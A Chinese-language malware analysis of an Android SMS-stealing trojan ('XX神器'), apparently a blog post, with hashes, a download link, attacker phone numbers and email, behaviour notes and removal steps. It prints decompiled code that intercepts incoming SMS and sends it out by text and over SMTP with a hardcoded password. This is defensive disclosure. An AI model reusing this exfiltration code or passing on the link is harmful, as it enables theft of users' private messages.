之前本文標題及內容誤將XXShenqi寫作XXZhushou,是作者一時手滑,想到了另一個應用了233
病毒指紋
釋放器包名:com.example.xxshenqi釋放器MD5:5956c29ce2e17f49a71ac8526dd9cde3本體包名:com.example.com.android.trogoogle本體MD5:b0dea6906329c47edbecd48adc15a996
收到朋友的短訊:「XX看這個,http://cdn.yyupload.com/down/4279193/XXshenqi.apk 」時,千萬不要打開,這是一個可以盜取用戶信息的手機病毒
目前主流手機安全軟件均為能查殺該病毒,屬於0day爆髮狀態;但是具有權限管理功能的安全軟件可以攔截短訊發送,但不能攔截郵件發送(除非禁止應用聯網)
其實這是一個寫得很菜的病毒,類似於PC時代的VB腳本小子的那種
病毒行為
經過逆向分析得知病毒具有以下行為
- 釋放器(XX神器)安裝後,誘導用戶安裝「資源包」,即病毒本體
- 本體監聽android.permission.RECEIVE_BOOT_COMPLETED和android.permission.RECEIVE_SMS廣播實現自啟動
- 本體接收來自18670259904手機號的短訊
- 本體收到短訊後,自動發送短訊到手機號,及郵箱[email protected],關鍵代碼如下
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
//..... abortBroadcast(); System.out.println("木馬收到非命令短訊。發送到控端=============================="); SmsManager localSmsManager = SmsManager.getDefault(); String str4; if (str3.length() != 11) { System.out.println("木馬覺得淘寶信息=============================="); str4 = "【特殊消息】" + str2; if (str4.length() > 60) { localSmsManager.sendTextMessage("18163657397", null, str4.substring(0, str4.length() / 2), null, null); localSmsManager.sendTextMessage("18163657397", null, str4.substring(1 + str4.length() / 2), null, null); } } for (;;) { new Thread() { public void run() { System.out.println("木馬Sleep(1000)=============================="); try { Thread.sleep(1000L); System.out.println("木馬killProcess================\t"); Process.killProcess(Process.myPid()); return; } catch (InterruptedException localInterruptedException) { for (;;) { localInterruptedException.printStackTrace(); } } } }.start(); break; localSmsManager.sendTextMessage("18163657397", null, str4, null, null); continue; System.out.println("木馬覺得是普通信息=============================="); } } //..... |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
protected void onHandleIntent(Intent paramIntent) { System.out.println("木馬進入MySendEmailService=============================="); String str = paramIntent.getStringExtra("String"); System.out.println("木馬開始發送郵件============================"); MailSenderInfo localMailSenderInfo = new MailSenderInfo(); localMailSenderInfo.setMailServerHost("smtp.qq.com"); localMailSenderInfo.setMailServerPort("25"); localMailSenderInfo.setValidate(true); localMailSenderInfo.setPassword("lishulili."); localMailSenderInfo.setSubject("信息"); localMailSenderInfo.setContent(str); new SimpleMailSender().sendTextMail(localMailSenderInfo); SimpleMailSender.sendHtmlMail(localMailSenderInfo); System.out.println("木馬完成發送郵件============================="); System.out.println("木馬離開MySendEmailService============================="); System.out.println("木馬killProcess=============================="); Process.killProcess(Process.myPid()); } |
查殺方案
進入設置->應用,卸載名為XX神器,及com.android.Trogoogle的應用
儘快修改各類賬號密碼
第一段話算是高級黑么
你懂就好【並沒有
_(:з」∠)_這”病毒”也是寫的很高貴呢
_(:з」∠)_